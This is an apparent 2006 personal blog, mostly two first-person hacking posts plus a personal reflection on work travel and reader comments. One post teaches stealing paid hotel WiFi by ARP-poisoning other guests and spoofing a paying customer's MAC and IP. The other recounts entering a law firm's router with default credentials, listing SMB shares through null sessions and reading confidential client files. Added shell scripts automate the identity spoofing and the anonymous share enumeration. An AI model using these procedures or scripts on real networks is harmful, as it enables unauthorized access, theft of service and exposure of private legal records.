Tuesday, February 28, 2006

Never Pay For WiFi Again
Sure, I have been stuck in a hotel for a few days with absolutely nothing to do. Left alone with my thoughts, one HBO that only plays shit, and a hotel that charges for WiFi access ... I have resorted to network violence. Even as I record this post I am starving some poor victim of bandwidth and leaving a trail of utter confusion. Allow me to explain, and before long YOU TOO can steal all of your paid WiFi access.

What you need:
* A WiFi card and an OS that allows you to change the MAC address
* A hotel that charges upwards of $200 a night, and still wants 10 bucks more for WiFi.

The idea is to assume the identity of a paying customer, and that is tougher than it sounds. The access point welcomes you to the network with an address over DHCP, but until you pay you can talk to the access point and nobody else. If you try to ping another user, your ARP request for their address goes unanswered: the access point stops you from learning the MAC address of anyone but itself (client isolation), and without a MAC address you cannot put a frame on the air to anyone else. So how do you get a victim to send you their MAC address? Become the access point. Give your interface the gateway's own IP address (192.168.1.1 here; use whatever gateway your DHCP lease named) and the other clients will answer your ARP requests and, worse for them, learn your MAC as the gateway's.

ifconfig eth1 192.168.1.1


Now you can wait, or if you know the IP address of a legitimate paying customer, try pinging them. Whether you get a reply does not really matter: the ARP exchange that precedes it is what fills your ARP table. Check it like this ...

arp -a


You should see the MAC address of the access point, maybe your own, and then the address or addresses of your potential victims. Start a second terminal and run ...

tcpdump -i eth1


Watch for a few minutes and see what kind of traffic people are generating. Requests for web pages, VPN connections and so on mean paying customers, so note their IP addresses. You are seeing this traffic because their ARP caches now map the gateway's IP to your MAC: their outbound packets come to you instead of the real access point, and you are not forwarding them anywhere. Do not stay in this mode for long, because you are derailing traffic for those folks and confusing the utter hell out of them, and it will not recover until their ARP entries expire and they ask again. It is also not very nice; you are cheating someone out of the access they paid for. Now ... let's get on with how to take advantage of them.

Now that you know the victim's MAC address and IP address, you need to assume it. This is the hard part, because a lot of OSes or WiFi cards, or BOTH, will stop you from falsifying your MAC address. I suppose this is for security's sake, but it pisses me off. I am trying to do all this on my Mac, and OS X hasn't allowed you to change the MAC address of the WiFi card since Jaguar. So in my case, I went out and got a "Live" distribution of Ubuntu Linux. The Live version can be booted directly from a CD-ROM, and it comes in a Mac PowerPC flavor!

Having booted my distro, and having come to a terminal we do the following ...

ifconfig eth1 down
ifconfig eth1 hw ether 00:11:22:33:44:55
ifconfig eth1 192.168.1.10
ifconfig eth1 up


First, we brought down the network interface. This is a must: most drivers refuse to change the address while the interface is up. For that matter, we are not "changing it" at all. The burned-in address stays in the card's own ROM; what changes is the address the driver writes into the source field of every frame it sends, and accepts frames for, which is all the access point ever sees. So the second line set a new 'hw' (hardware) address of type 'ether' (Ethernet) to '00:11:22:33:44:55'. That is an imaginary MAC address, so imagine it is our victim's. If the driver does not support the override, ifconfig says so; if there is no error message, run ifconfig eth1 again and confirm the new value is shown before going on.

The third line configured the IP address of our victim, and the last line 'raises' the interface, bringing it back up. At this point, to the access point, you ARE the victim: same MAC address, same IP address, so the session it already marked as paid covers your frames too. You have become ... THEM. Bring up a browser and start surfing.
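Here is the whole procedure as one script, an added example that is not from the original post. It validates the MAC and IP you intend to borrow (a typo here means a dead interface, not a borrowed session), reads the interface's current address from sysfs so you can put it back, prints the ifconfig sequence by default, and executes it only when you set APPLY=1 and run it as root. eth1, 00:11:22:33:44:55 and 192.168.1.10 are the post's placeholders; the sysfs path, the APPLY variable and the function names are my own choices. On a current Linux the same change is spelled "ip link set dev eth1 address ...", but the ifconfig form is kept to match the post.

```shell
#!/bin/sh
# assume_identity.sh: borrow a MAC/IP pair on a wireless interface (ifconfig syntax,
# as in the post). Dry run by default; APPLY=1 executes the commands (needs root).
set -eu

# Accept only a canonical colon-separated 48-bit address.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$'
}

# Dotted quad with every octet in 0..255.
valid_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    saved_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$saved_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# Address the driver currently uses (sysfs on Linux); "unknown" if unreadable.
current_mac() {
    cat "/sys/class/net/$1/address" 2>/dev/null || echo unknown
}

# Print the exact command sequence from the post, one per line, after checking inputs.
plan_commands() {
    plan_iface=$1
    plan_mac=$2
    plan_ip=$3
    valid_mac "$plan_mac" || { echo "refusing: bad MAC '$plan_mac'" >&2; return 1; }
    valid_ipv4 "$plan_ip" || { echo "refusing: bad IPv4 '$plan_ip'" >&2; return 1; }
    printf '%s\n' \
        "ifconfig $plan_iface down" \
        "ifconfig $plan_iface hw ether $plan_mac" \
        "ifconfig $plan_iface $plan_ip" \
        "ifconfig $plan_iface up"
}

# Commands that undo the change, given the address saved before it.
restore_commands() {
    printf '%s\n' \
        "ifconfig $1 down" \
        "ifconfig $1 hw ether $2" \
        "ifconfig $1 up"
}

# Run each planned line through sh -c; a failing step aborts the rest (set -e).
apply_plan() {
    plan_commands "$@" | while IFS= read -r cmd; do
        echo "+ $cmd" >&2
        sh -c "$cmd"
    done
}

IFACE=${IFACE:-eth1}
VICTIM_MAC=${VICTIM_MAC:-00:11:22:33:44:55}   # the post's imaginary victim
VICTIM_IP=${VICTIM_IP:-192.168.1.10}
ORIGINAL_MAC=$(current_mac "$IFACE")

if [ "${APPLY:-0}" = 1 ]; then
    apply_plan "$IFACE" "$VICTIM_MAC" "$VICTIM_IP"
    echo "done; to revert, run:" >&2
    restore_commands "$IFACE" "$ORIGINAL_MAC" >&2
else
    echo "# dry run (current MAC of $IFACE: $ORIGINAL_MAC); set APPLY=1 to execute"
    plan_commands "$IFACE" "$VICTIM_MAC" "$VICTIM_IP"
fi
```

Run it as "sh assume_identity.sh" to see the plan, and as "VICTIM_MAC=... VICTIM_IP=... APPLY=1 sudo -E sh assume_identity.sh" to carry it out. The restore lines it prints afterwards are the quickest way to stop being the victim once you are done.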

What are the repercussions? There are a few. For one, the victim is probably still using the WiFi access they paid for, and now so are you ... as them. So imagine what the access point must be thinking. To the access point, one station is making all of the requests that are actually coming from two different people, and it happily answers each one. When the traffic comes back the other way, the access point sends it to that 'one' MAC address, which both of your radios accept. So if I bring up Yahoo.com, the web page comes back to both of you. The victim's workstation did not ask for it, so its TCP stack either discards the segments or answers them with a reset, which can kill your connection if it arrives first. And if your victim is especially savvy, YOU may become HIS victim: every frame meant for you also lands on his card, so a sniffer there sees all of the traffic that only you should be seeing.

Otherwise, everything works just fine. Surprisingly.

Chicago Week #2
Why did I EVER agree to teaching two solid weeks in Chicago? Oh yeah, it was the money. That's it. At the end of last week I came home for the weekend. And never has a weekend passed by so quickly. Before I knew it, I was back at the airport and ready to go back to Chicago. Sitting on the plane, and watching my home town disappear from under me I flipped on my iPod and hit 'random shuffle'. Wouldn't you know it? Simon and Garfunkel. Homeward Bound. I have never paid that much attention to the song. It's not a song about 'going home'. It's a song about being far away from home, doing business with strangers, and questioning your sanity on the road. I just sort of welled up.

I suppose this is the life for a bachelor. Someone without any goals of family. Or someone who is just plain crazy. In fact, on my way back from Chicago last week I sat next to a guy on the plane. He was your typical "road warrior". Wearing his short-sleeved polo shirt and khaki pants, and gripping his Pocket PC, he was on his way to my home town. We struck up a conversation about Columbus and what a nice town it is. "I'll only be here for an hour or so, and then I have to fly right back out". He went on to tell me how crazy his schedule is, and how he hasn't been home in nearly a month. We exchanged complaints about hotel living, airport security, lack of entertainment, etc. Near the end of our conversation he said, "it's weird you know ... living the bachelor lifestyle after all these years". I gathered from the conversation that he had a family, but he didn't know them very well any more. Divorced, I imagine. Or perhaps he is one of these "barely married" types that has a wife whom he never sleeps with ... and really doesn't want to sleep with when he's at home.

At any rate, the whole thing put me in a downswing, and I could just see myself becoming that guy. This lonely old dude who roams the world and has obviously forgotten about what's important in life. For that matter, how does technology (and what I do with it) really make anyone happy?

My entire career is a lie. I am an "instructor". I teach people how to use products because at some point their manager or CEO was sold on said product. It is now my job to convince them that they should use it, and perhaps give them some pointers. They will then use said product to move information from point A to point B. A nice analogy to information technology might be Douglas Adams' explanation of 'the bypass' (highway) in The Hitchhiker's Guide to the Galaxy. He said that the bypass takes people from point A to point C. And people from point C to point A. All driving very fast, of course. This leaves people in point B to wonder just what's so great about these two points that they have to drive so far and so fast to get there. I ... am at point B in my life. Information technology does little (if anything) to aid in human compassion. Being that human compassion is the only answer to true happiness, my entire career is a waste of time and money.

This leaves me in an awkward position. I can't walk into class and tell everyone why they are wasting their lives along with me. I have to keep selling this lie. As much as I try not to be ... I am part of the machine.

I need out of the training business, and I need a position where I can go home at night and do what's important, and that is to be close to my family. I need them, and they need me. I am doing nothing for my family when I am 500 miles away other than creating suffering.

Tonight I'll sing my songs again,
I'll play the game and pretend.
But all my words come back to me in shades of mediocrity
Like emptiness in harmony I need someone to comfort me.
Homeward bound,
I wish I was,
Homeward bound,
Home where my thoughts escaping,
Home where my music's playing,
Home where my love lies waiting
Silently for me

-Homeward Bound : Simon and Garfunkel


Historic Comments
Just make enough money to pay off all your debts, buy a cabin in the woods somewhere, quit your job, and drop off the radar. Sometimes the best way to deal with technology is to turn it off for a while.
Poe | 03.02.06 - 2:18 am | #

God bless you Poe. You understand!!

-Ray
Ray Dios Haque | 03.02.06 - 11:24 am | #

I've learned a lot of networking information and about dealing with life from reading your blog. You're a valuable instructor to an unknown number of people over the internet.

Thank You!
Devo | 03.03.06 - 6:49 pm | #

Hey S! I can so relate on the technology front. I feel like I've forgotten much more than I remember anymore. I am so bored with being a code monkey but its the only thing anyone wants to pay me for right now.

I really want to be a Sommelier (wine expert) but I am looking at years of study and tests to get there. These tests cost money and just how am I supposed to get this money? Being a code monkey. It's a means to an end.

So, whatever happened to your attempts to break into the security racket? I would think you'd be a natural. You'd also be able to spend more time with your family which seems to be the biggest issue with your current situation.

later,

Rich
Evil_Rich | 03.14.06 - 10:24 am | #

Devo - I'm glad my blogs have educated and inspired you.

Rich - Still a code monkey, eh? I just used a term the other day that you and the other code monkeys loved, "dancing balogna". That takes me back. Anyway, I would love to be a security auditor. Get paid to break into people's networks. Unfortunately that job only seems to be available to folks with degrees, and so-called "established experts". It's all a means to an end I suppose. We're just slaves together, to the information machine.

-Ray
Ray Dios Haque | 03.16.06 - 7:59 pm | #

Thursday, February 09, 2006

Steel-ing Documents
This week I travelled to Pittsburgh to teach a three-day course in a downtown office building. When I passed through PA last week, I was blown away by just how many Steelers fans there are (well outside of Pittsburgh). After winning the Super Bowl, the fans of course went nuts. I was unaware of the celebration that was going to take place so I was a little surprised when I went to get a room at my usual hotel and they were booked. Whoops! I was able to find a slightly cheaper hotel not too far away, that also provided free Internet access and a shuttle downtown.

By the way, I have had a good couple of weeks. Last week I took the family to New York. It was a vacation. That is, I was not teaching there. We just went for fun. We saw the statue of Liberty, Ellis Island, and Niagara Falls. And now I was in my favorite city, Pittsburgh. So you won't hear any bitching and whining from me in this posting (awww shucks!).

It seems that the Steelers were having one hell of a homecoming on Tuesday afternoon. There was going to be a parade and everything. So at lunchtime, I let everyone break for an hour and a half to go watch it. I myself also went down to the streets. It was simply amazing. There were 250,000 people in the streets. All of downtown, and every other Steelers fan that had rolled into town, lined the streets. The players came through, cheering, waving to the fans, signing autographs, and even doing some stage diving. Yes, stage diving. It was one hell of a homecoming party, and I was lucky enough to be around at the time.

The following day I found myself in this 30-story office building, about 15 floors up. It was lunchtime and I had decided not to go out. I could hold off until dinner, and I had spent way too much of my travel money on t-shirts to take home to my wife (Steelers Super Bowl champ shirts). While I was waiting for my students to pop back, I dropped Audrey onto the window sill and went shopping for access points. And wow ... I found a lot of them. Here is what KisMAC detected in "passive mode".



I hopped onto the first one that I found without WEP enabled. It was a "linksys" access point. The signal was strong, and I had an internet connection with it. But ... that just didn't satisfy my urge to explore. I looked around the network for hosts, and found none. I was likely stuck in a private network, that was in turn plugged into a separate private network. Notice that there are actually two networks named "linksys"? I did. And I wanted to connect to the 'other one'. Like Windows, a Mac will only display the network name, not the actual access points. And when you have two named the same thing, you never know which one you are physically connected to. Luckily, later versions of KisMAC like the one I am using allow you to right-click on an access point and join it. And so I did!

Once connected I ran "findsmb" in a terminal and it came up with nothing. I was sure there were windows hosts ... or something on this network. I pinged around and got some semi-conclusive results. Right about now, nmap would be a useful tool but I just reloaded the OS on this laptop a week ago and I was without all my old tools. Where else could I get a map of this network? Of course! I need to see the DHCP lease table. I'll bet that I can connect to the access point and provide the default admin username and password to get it. So I brought up 192.168.1.1 in my browser. I used the username and password of "admin" and I was in.



Next stop was to find the dhcp clients list on this thing. These menus were awful. I much prefer D-Link for navigation. But after much digging, I found a button for the client list. This is what I got.



I know, I know. I hate to blur things out. But what I had stumbled into was obviously a law firm. And I don't want to go to prison. So excuse the "mosaic blurs". As you can see, there were plenty of hosts on this network (or there had been lately). A lot of these looked to be laptops. Finding them would be a matter of trial and error. Again, nmap would be helpful. I REALLY need to put some developer tools on this laptop so I can compile my goodies. In the meantime, a simple file browse request will do the trick.

OS X ships with the smbclient utility, and I will use it against this list of IP addresses. The usage is simple: smbclient -L //ipaddress, where -L says "show me a list of your shares". It prompts for a password; pressing Enter sends an empty one (a null session), and adding -N skips the prompt altogether. When a host hung, I hit CTRL+C to cancel and moved on to the next one. Here is my terminal dialogue ...

Last login: Wed Feb  8 11:57:59 on ttyp1
Welcome to Darwin!
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.101
session request to 192.168.1.101 failed (Called name not present)
รง^C
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.102
timeout connecting to 192.168.1.102:445
Error connecting to 192.168.1.102 (Host is down)
Connection to 192.168.1.102 failed
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.105
Password:
Domain=[PARALEGAL] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
SharedDocs Disk
Printer7 Printer SHARP AL-1641CS (Copy 1)
Printer4 Printer Sharpdesk Composer
Printer5 Printer SHARP AL-1641CS (Copy 3)
Printer3 Printer SHARP AL-1641CS
sharp Printer SHARP AL-1641CS (Copy 2)
Printer9 Printer PrimoPDF
Printer2 Printer HP Deskjet 3840 Series
MARCIAL Disk
Printer Printer HP Image Writer
session request to 192.168.1.105 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[PARALEGAL] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient
Usage: [-?EgVNkP] [--usage] [-R NAME-RESOLVE-ORDER] [-M HOST] [-I IP] [-L HOST]
[-t CODE] [-m LEVEL] [-T IXFqgbNan] [-D DIR] [-c ARG] [-b BYTES]
[-p PORT] [-d DEBUGLEVEL] [-s CONFIGFILE] [-l LOGFILEBASE]
[-O SOCKETOPTIONS] [-n NETBIOSNAME] [-W WORKGROUP] [-i SCOPE]
[-U USERNAME] [-A FILE] [-S on|off|required] service
Ray-Dios-Haques-Computer:~ rayhaque$ smbmount
-bash: smbmount: command not found
Ray-Dios-Haques-Computer:~ rayhaque$ mountsmb
-bash: mountsmb: command not found
Ray-Dios-Haques-Computer:~ rayhaque$ mount -t smb
Ray-Dios-Haques-Computer:~ rayhaque$ mount -t smb //192.168.1.105/MARCIAL
usage: mount [-dfruvw] [-o options] [-t ufs | external_type] special node
mount [-adfruvw] [-t ufs | external_type]
mount [-dfruvw] special | node
Ray-Dios-Haques-Computer:~ rayhaque$ mount -t smbfs //192.168.1.105/MARCIAL
usage: mount [-dfruvw] [-o options] [-t ufs | external_type] special node
mount [-adfruvw] [-t ufs | external_type]
mount [-dfruvw] special | node
Ray-Dios-Haques-Computer:~ rayhaque$


It looks like I found a winner. He has a couple of interesting looking shares. It's too bad I can't remember how to mount a share from terminal. Instead, I end up using "Finder" to "Connect to server ...". Here is that box.



There is a delay, and I am now asked to authenticate. This could be a problem, as I am not a user on their domain/directory ... if they have one. I will try "guest" with no password. This probably won't work.



Oh, and it does work. How sad! I wonder what we will find here. Let's have a look at this share, shall we?



These look like ... "lawyer stuff" ... or something. Let's have a closer look.



Looks like an interesting story. Some woman's husband is getting deported, and she is asking that they please not take him away. How is it this guy rakes in $94k a year raising horses? I'm in the wrong fucking business. Either I need to start raising horses, or become an immigrant and hook up with one.



I don't know what this fingerprint business is about. But I thought it looked amusing.

There were no doubt other goodies on this workstation, but I had a whole network to explore, and lunchtime was going by fast. I went ahead and moved onto my next target. Here is that terminal dialogue ...

Last login: Wed Feb  8 12:09:52 on ttyp2
Welcome to Darwin!
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.106
session request to 192.168.1.106 failed (Called name not present)
session request to 192 failed (Called name not present)
Password:
Domain=[ATTORNEY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Clients Disk
My Documents Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
SharedDocs Disk
C Disk
Impro56 Disk
Printer3 Printer PrimoPDF
Printer5 Printer KONICA MINOLTA PagePro 1350W (Copy 1)
Case Lists Disk
Printer2 Printer KONICA MINOLTA PagePro 1350W
ADMIN$ Disk Remote Admin
C$ Disk Default share
Printer Printer Microsoft Office Document Image Writer
session request to 192.168.1.106 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[ATTORNEY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
Ray-Dios-Haques-Computer:~ rayhaque$


You'll notice that it asks me for a password at some point, and I just struck the Enter key as if to say "I don't need no steenkin' password". That did the trick, and I got a list of shared stuff. Would you LOOK at these?

Note to prospective network users/attorneys/fucktards: Do not share your entire client list, without security, call it Clients, and leave it lying on a non-secured access point. Do not share "My Documents". They are YOUR fucking documents. Not mine. Keep them to yourself. Do not share your entire C drive. In fact, having shared your entire C drive in such a manner, you can disregard all of these other rules, because you are an idiot, and you blew it.

I attach to the "C" share just to see if the user was indeed that stupid. They were. I hit the "Clients" folder to see if it does indeed have a list of clients, or documents pertaining to their client base. It does.
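The two terminal sessions above, done by hand one host at a time, as a script: an added example that is not from the original post. It runs the same smbclient -L query against each host you name, with -N so it never stops at the password prompt, and parses the share table so that disk shares reachable by an anonymous user (everything not ending in $) and whole-drive shares like C are pulled out automatically. The built-in sample is a constructed copy of the ATTORNEY host's listing from the transcript above, so the parser can be exercised without a network; the function names and the classification rules are mine.

```shell
#!/bin/sh
# smbenum.sh: null-session share enumeration across a list of hosts, plus a parser
# for `smbclient -L` output so the interesting shares can be picked out automatically.
set -eu

# Ask a host for its share list without credentials. -N skips the password prompt
# (the post's "hit Enter" step); a guest-enabled XP box answers a null session.
enum_host() {
    smbclient -L "//$1" -N 2>&1
}

# Read `smbclient -L` output on stdin and print the names of shares of one type
# (Disk, Printer or IPC). Share names may contain spaces ("My Documents"), so the
# type column is found as the first field that is exactly one of the three types.
# awk splits on any run of whitespace, so the collapsed single-spaced output as
# pasted in the post parses the same as the tab-aligned original.
list_shares() {
    awk -v want="$1" '
        /^[[:space:]]*Sharename[[:space:]]+Type/ { inlist = 1; next }
        inlist && /^[[:space:]]*-/               { next }
        inlist && NF == 0                        { inlist = 0 }
        inlist {
            t = 0
            for (i = 2; i <= NF; i++)
                if ($i == "Disk" || $i == "IPC" || $i == "Printer") { t = i; break }
            if (t == 0) next
            name = $1
            for (j = 2; j < t; j++) name = name " " $j
            if ($t == want) print name
        }'
}

# Disk shares that expose a whole drive (C, D$ ...) rather than a folder.
drive_shares() {
    list_shares Disk | grep -E '^[A-Za-z]\$?$' || true
}

# Disk shares an anonymous user could plausibly reach: everything except the
# $-suffixed defaults (ADMIN$, C$, print$), which need administrator rights.
user_disk_shares() {
    list_shares Disk | grep -v '\$$' || true
}

# Constructed sample: the ATTORNEY host's listing from the post, tab-aligned as
# smbclient prints it.
sample_listing() {
    cat <<'EOF'
session request to 192.168.1.106 failed (Called name not present)
Domain=[ATTORNEY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

	Sharename       Type      Comment
	---------       ----      -------
	Clients         Disk
	My Documents    Disk
	IPC$            IPC       Remote IPC
	print$          Disk      Printer Drivers
	SharedDocs      Disk
	C               Disk
	Impro56         Disk
	Printer3        Printer   PrimoPDF
	Printer5        Printer   KONICA MINOLTA PagePro 1350W (Copy 1)
	Case Lists      Disk
	Printer2        Printer   KONICA MINOLTA PagePro 1350W
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Printer         Printer   Microsoft Office Document Image Writer

	Server               Comment
	---------            -------
EOF
}

# Query every host given and print the shares worth a closer look.
scan() {
    for host in "$@"; do
        echo "== $host"
        enum_host "$host" | user_disk_shares | sed 's/^/   /'
    done
}

if [ $# -eq 0 ]; then
    echo "usage: $0 HOST [HOST...]; showing the built-in sample instead" >&2
    sample_listing | user_disk_shares
else
    scan "$@"
fi
```

Feed it the addresses from the DHCP client list ("sh smbenum.sh 192.168.1.101 192.168.1.105 192.168.1.106") and it prints, per host, the folders and drives an anonymous user can see, which is exactly the list the note above complains about. On the Mac, the terminal equivalent of the Finder "Connect to server ..." dialogue the post falls back to is mount_smbfs //guest@192.168.1.105/MARCIAL /Volumes/marcial after creating the mount point; I note that as an assumption about that era's OS X rather than something run here.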




This is the point at which I make an ethical decision. Should I delve into the lives of others and begin reading their personal files? Do I really want to explore the legal matters of strangers, and further incriminate myself?

...

Of course I fucking do it! Here are some samples of the better tidbits I found.




Just when I was getting to the really good stuff my students started returning from lunch. My laptop is a real eyesore, and Audrey just loves the attention she gets for her Frankenstein-ish appearance. After a couple of awkward moments with students hanging over my shoulder asking "whatcha' doing?" I decided to end this adventure and get back to work.

Next time I am out in Pittsburgh I really need to go wardriving, or better yet war-walking.

Historic Comments
Christ Ray, see what happens when you try to do a bigboy job with a "mac"?

"Where else could I get a map of this network? Of course! I need to see the DHCP lease table"

Fuck "findsmb" dude. Hitting the lease table is first on my list. No waiting, no guessing, and if someone is dumb enough to name their router "Linksys" then there is a 92.3% chance the default password is the same.

On a side note, I would have to say as of late that I really like the Auditor (or BackTrack) live CD from remote-exploit.org. It just has all the tools/drivers in one package.

Now, add that with a network card that supports packet injection and you've got wep cracking in less than a couple minutes. Longer for 3 types of wpa.

anyways....i digress....i need ben and jerry's.
Phrightener | 02.10.06 - 11:17 pm | #

you law breaker you
LiteHedded | Homepage | 02.14.06 - 10:33 am | #

Should have renamed their documents: Dear John Letter, People I'm Firing, People I'm Sleeping With, Embezzlement Funds, Potato Bar, etc...

Keep them guessing when they need that document next.
Poe | 02.16.06 - 7:35 pm | #

Phrighty: I love you. When are we going to finally get together and have gay sex? I'm going to have to check out that Auditor distro. I was just telling someone the other day about how cool Knoppix-STD was before it got so old and useless.

Poe: Hah! They would probably learn to live with the annoyance instead of figuring out how to fix it. "Where is the Smith case?" - "Oh, check the 'Go Fuck Yourself' folder, and open up 'i shit myself lol.doc'.

-Ray
Ray Dios Haque | 02.21.06 - 8:19 pm | #